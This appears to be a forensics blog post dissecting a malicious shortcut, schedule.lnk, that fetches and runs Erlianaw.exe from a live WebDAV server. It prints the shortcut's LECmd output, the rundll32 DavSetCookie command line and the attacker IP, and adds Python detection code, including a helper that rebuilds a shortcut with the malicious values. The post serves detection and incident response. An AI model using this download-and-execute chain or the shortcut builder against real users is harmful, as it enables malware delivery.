Today I Learned - WebDAV Cache
Introduction
User @karol_paciorek recently tweeted about an open directory containing malware, depicted in Figure 1. You can find the original post here:
Along with the MS_calendar.lnk file mentioned in the tweet from @karol_paciorek, there are additional files publicly available on that server:
LNK Analysis
We will examine the LNK file schedule.lnk (MD5: 62d5389d43931237e9d3d1aa77c87483), located in the same directory as the MS_calendar.lnk file. To analyze it, we will use LECmd.exe, a handy tool developed by Eric Zimmerman.
C:\Users\malmoeb\Downloads>LECmd.exe -f schedule.lnk
LECmd version 1.5.0.0
Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd
Command line: -f schedule.lnk
Processing C:\Users\malmoeb\Downloads\schedule.lnk
Source file: C:\Users\malmoeb\Downloads\schedule.lnk
Source created: 2024-08-06 07:51:47
Source modified: 2024-08-06 07:51:47
Source accessed: 2024-08-06 07:52:08
--- Header ---
Target created: 2024-08-04 23:17:22
Target modified: 2024-07-01 03:33:05
Target accessed: 2024-07-01 03:33:05
File size (bytes): 101,888
Flags: HasLinkInfo, HasRelativePath, HasWorkingDir, HasIconLocation, IsUnicode, HasExpString, EnableTargetMetadata
File attributes: FileAttributeArchive
Icon index: 0
Show window: SwShowminnoactive (Display the window as minimized without activating it.)
Relative Path: .\Erlianaw.exe
Working Directory: \\216.9.224.58@5555\DavWWWRoot\files
Icon Location: \\216.9.224.58@5555\DavWWWRoot\files\fold.ico
--- Link information ---
Flags: CommonNetworkRelativeLinkAndPathSuffix
Network share information
Share name: \\216.9.224.58@5555\DAVWWWROOT
Provider type: WnncNetDav
Share flags: ValidNetType
Common path: files\Erlianaw.exe
--- Extra blocks information ---
>> Property store data block (Format: GUID\ID Description ==> Value)
dabd30ed-0043-4789-a7f8-d013a4736622\100 Item Folder Path Display Narrow ==> files (\\216.9.224.58@5555\DavWWWRoot)
b725f130-47ef-101a-a5f1-02608c9eebac\10 Item Name Display ==> Erlianaw.exe
b725f130-47ef-101a-a5f1-02608c9eebac\15 Date Created ==> 08/04/2024 23:17:22
b725f130-47ef-101a-a5f1-02608c9eebac\12 Size ==> 101888
b725f130-47ef-101a-a5f1-02608c9eebac\4 Item Type Text ==> Application
b725f130-47ef-101a-a5f1-02608c9eebac\14 Date Modified ==> 07/01/2024 03:33:05
28636aa6-953d-11d2-b5d6-00c04fd918d0\30 Parsing Path ==> \\216.9.224.58@5555\DavWWWRoot\files\Erlianaw.exe
By analyzing this LNK file (the full output from LECmd.exe is depicted above), we can identify the next stage in the infection chain that would be downloaded to the victim host upon executing this LNK file:
Relative Path: .\Erlianaw.exe
Working Directory: \\216.9.224.58@5555\DavWWWRoot\files
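The two fields quoted above come straight out of the LNK StringData section, so a triage script does not need a full LNK parser to spot a shortcut whose working directory or icon lives on a WebDAV share. The following is an added example, not code from the original post or from LECmd: it walks the fixed parts of the MS-SHLLINK layout (header, optional LinkTargetIDList, LinkInfo, then the flag-gated StringData strings) and flags any UNC path of the form \\host@port\... or \\host@SSL\.... The build_lnk() helper constructs a minimal test fixture carrying the same flag set and string values as schedule.lnk; it is not the real file.

```python
"""Pull StringData fields out of a Shell Link (.lnk) and flag WebDAV targets.

Layout follows MS-SHLLINK: ShellLinkHeader (76 bytes), then LinkTargetIDList,
LinkInfo and StringData, each present only when its LinkFlags bit is set.
ExtraData blocks after the strings are ignored here.
"""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1); only those this parser needs.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} in little-endian byte order.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData sections appear in this fixed order, each gated by its flag.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# UNC path whose host part carries a WebDAV port (\\host@5555\...) or @SSL.
WEBDAV_UNC = re.compile(r"^\\\\[^\\]+@(\d+|SSL)\\", re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags and the decoded StringData fields of a .lnk blob."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = HEADER_SIZE
    # LinkTargetIDList: 2-byte IDListSize followed by that many bytes.
    if flags & HAS_LINK_TARGET_ID_LIST:
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    # LinkInfo: its first DWORD is the size of the whole structure, so skip it.
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)
    strings = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        # CountCharacters (2 bytes) then the string, UTF-16LE when IsUnicode is set.
        (count,) = struct.unpack_from("<H", data, pos)
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        strings[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return {"flags": flags, "strings": strings}


def webdav_targets(parsed: dict) -> list:
    """Names of the StringData fields whose value points at a WebDAV share."""
    return [n for n, v in parsed["strings"].items() if WEBDAV_UNC.match(v)]


def build_lnk(relative_path: str, working_dir: str, icon_location: str) -> bytes:
    """Constructed test fixture: minimal LNK with schedule.lnk's flag set."""
    flags = (HAS_LINK_INFO | HAS_RELATIVE_PATH | HAS_WORKING_DIR
             | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, flags)
    header += b"\x00" * (HEADER_SIZE - len(header))  # attributes/timestamps zeroed
    # Smallest LinkInfo: 28-byte fixed part, no optional structures, size = 28.
    link_info = struct.pack("<7I", 28, 28, 0, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, working_dir, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + link_info + body


# Fixture built from the values LECmd printed for schedule.lnk (constructed bytes).
SAMPLE = build_lnk(
    r".\Erlianaw.exe",
    r"\\216.9.224.58@5555\DavWWWRoot\files",
    r"\\216.9.224.58@5555\DavWWWRoot\files\fold.ico",
)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE)
    for name, value in parsed["strings"].items():
        print(f"{name:14s} {value}")
    print("WebDAV-backed fields:", webdav_targets(parsed))
```

On the fixture above the parser reports working_dir and icon_location as WebDAV-backed, which is exactly the pair of fields worth alerting on when sweeping a mail gateway quarantine or a download folder for shortcuts.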
WebDAV Connection
As already explained in an earlier blog post (Abusing the “search-ms” URI protocol handler), WebDAV connections are carried out via a DLL that is started with rundll32.exe:
CommandLine:
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie
216.9.224.58@5555 http://216.9.224.58:5555/
The user agent utilized for this WebDAV connection is noteworthy:
Didier Stevens described and investigated this user agent years ago. For organizations proxying their traffic, you might want to monitor this user agent.
Sysmon
While analyzing the Sysmon logs, I stumbled upon something interesting.
File created:
TargetFilename:
C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\TfsStore\Tfs_DAV\{CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe
What the heck is this \TfsStore\Tfs_DAV\ directory and the executable {CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe in it? As it turns out, these files could provide evidence of files retrieved from remote WebDAV server(s) to the local system, at least temporarily.
Tfs_DAV
And sure enough, the MD5 of the file {CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe maps to a file on VirusTotal named Erlianaw.exe, the filename we saw earlier during the analysis of the LNK file.
Late to the party
It looks like I’m late to the party, though :) @enigma0x3 already discussed in 2017 that files executed via WebDAV are copied locally to the TfsStore\Tfs_DAV folder.
And, another interesting fact: @SBousseaden mentioned that .url files in the AppData\Local\Temp\TfsStore\Tfs_DAV cache folder might contain the URL the downloaded files came from (referencing CVE-2024-21412).
Once again, standing on the shoulders of giants.
What I learned today: short blog posts about information that is new to me.
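The three host artifacts discussed above (the rundll32 davclnt.dll,DavSetCookie process creation, a GUID-named executable appearing in Tfs_DAV, and .url files in the same cache folder) are easy to chain into one detection. The following is an added example, not code from the original post or from any of the referenced researchers: it runs over a handful of constructed Sysmon-style ProcessCreate (ID 1) and FileCreate (ID 11) events, treats a DavSetCookie host as external when it is not a private IP and not under an assumed internal suffix (.corp.example), and links a cached executable to any external WebDAV session started in the preceding ten minutes (a window chosen for the example).

```python
"""Detect WebDAV client activity and Tfs_DAV cache drops in Sysmon-style events.

The events below are constructed for this example; field names follow Sysmon's
ProcessCreate (EventID 1) and FileCreate (EventID 11) schemas.
"""
import ipaddress
import re
from datetime import datetime, timedelta

# First argument after DavSetCookie is host[@port] of the WebDAV server.
DAVSETCOOKIE = re.compile(r"davclnt\.dll,DavSetCookie\s+(\S+)", re.IGNORECASE)
# Anything written into the WebDAV client cache folder.
TFS_DAV_FILE = re.compile(r"\\TfsStore\\Tfs_DAV\\(?P<name>[^\\]+)$", re.IGNORECASE)
# Cached executables carry a GUID name, as seen in the Sysmon event above.
GUID_EXE = re.compile(r"^\{[0-9A-F-]{36}\}\.(exe|dll|scr|cpl|js|vbs|hta)$", re.IGNORECASE)

INTERNAL_SUFFIXES = (".corp.example",)  # assumed internal DNS suffix
CORRELATION_WINDOW = timedelta(minutes=10)  # chosen for the example


def is_external(host_token: str) -> bool:
    """True unless the DavSetCookie host is a private IP or an internal hostname."""
    host = host_token.split("@", 1)[0]
    if host.lower().endswith(INTERNAL_SUFFIXES):
        return False
    try:
        return not ipaddress.ip_address(host).is_private
    except ValueError:  # a hostname, not an IP literal
        return True


def analyze(events: list) -> list:
    """Return findings for external WebDAV sessions and Tfs_DAV cache drops."""
    findings = []
    dav_starts = []  # (time, host) of external DavSetCookie events seen so far
    for ev in events:
        ts = datetime.fromisoformat(ev["UtcTime"])
        if ev["EventID"] == 1:
            m = DAVSETCOOKIE.search(ev.get("CommandLine", ""))
            if m and is_external(m.group(1)):
                dav_starts.append((ts, m.group(1)))
                findings.append({"rule": "webdav_client_external", "time": ts,
                                 "host": m.group(1), "pid": ev["ProcessId"]})
        elif ev["EventID"] == 11:
            m = TFS_DAV_FILE.search(ev.get("TargetFilename", ""))
            if not m:
                continue
            name = m.group("name")
            if GUID_EXE.match(name):
                # Tie the cached binary to WebDAV sessions opened shortly before.
                recent = [h for t, h in dav_starts if timedelta(0) <= ts - t <= CORRELATION_WINDOW]
                findings.append({"rule": "webdav_cache_executable", "time": ts,
                                 "file": name, "linked_hosts": recent})
            elif name.lower().endswith(".url"):
                # Per the note above, cached .url files may record the origin URL.
                findings.append({"rule": "webdav_cache_url_file", "time": ts,
                                 "file": name, "note": "inspect for origin URL"})
    return findings


# Constructed events; the first and third mirror the values quoted in this post.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2024-08-06 07:52:10", "ProcessId": 4120,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie "
                    r"216.9.224.58@5555 http://216.9.224.58:5555/"},
    {"EventID": 11, "UtcTime": "2024-08-06 07:52:14", "ProcessId": 4120,
     "TargetFilename": r"C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\TfsStore\Tfs_DAV"
                       r"\{CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe"},
    {"EventID": 11, "UtcTime": "2024-08-06 07:52:15", "ProcessId": 4120,
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\TfsStore\Tfs_DAV\schedule.url"},
    {"EventID": 11, "UtcTime": "2024-08-06 07:53:00", "ProcessId": 900,
     "TargetFilename": r"C:\Users\alice\Downloads\report.pdf"},  # unrelated, ignored
    {"EventID": 1, "UtcTime": "2024-08-06 07:55:00", "ProcessId": 4188,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie "
                    r"fileshare.corp.example https://fileshare.corp.example/"},  # internal
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

The internal file share in the last event is deliberately not alerted on; the DavSetCookie command line alone fires constantly in environments that use SharePoint or internal WebDAV, so the host allow-listing and the correlation with a GUID-named executable in Tfs_DAV are what keep the rule usable.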